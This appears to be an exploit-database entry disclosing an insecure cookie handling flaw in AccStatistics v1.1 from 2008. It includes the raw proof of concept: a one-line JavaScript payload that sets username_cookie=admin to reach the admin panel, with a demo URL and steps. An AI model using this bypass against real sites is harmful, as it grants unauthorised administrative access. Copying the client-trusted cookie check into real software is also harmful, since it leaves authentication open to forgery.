AccStatistics v1.1 Insecure Cookie Handling

vendor:

AccStatistics

by:

Hakxer

7.5

CVSS

HIGH

Insecure Cookie Handling

264

CWE

Product Name: AccStatistics

Affected Version From: v1.1

Affected Version To: v1.1

Patch Exists: YES

Related CWE: N/A

CPE: accstatistics

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AccStatistics v1.1 Insecure Cookie Handling

A vulnerability in AccStatistics v1.1 allows an attacker to gain administrative access by setting a cookie with the username_cookie parameter set to 'admin'.

Mitigation:

Upgrade to the latest version of AccStatistics.

Source

Exploit-DB raw data:

###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/

# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php

PoC : javascript:document.cookie="username_cookie=admin";

[~] Admin panel
http://www.accstatistics.com/demo/index.php
[~] Execute JS Code javascript:document.cookie="username_cookie=admin";
[~] Refresh


# Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]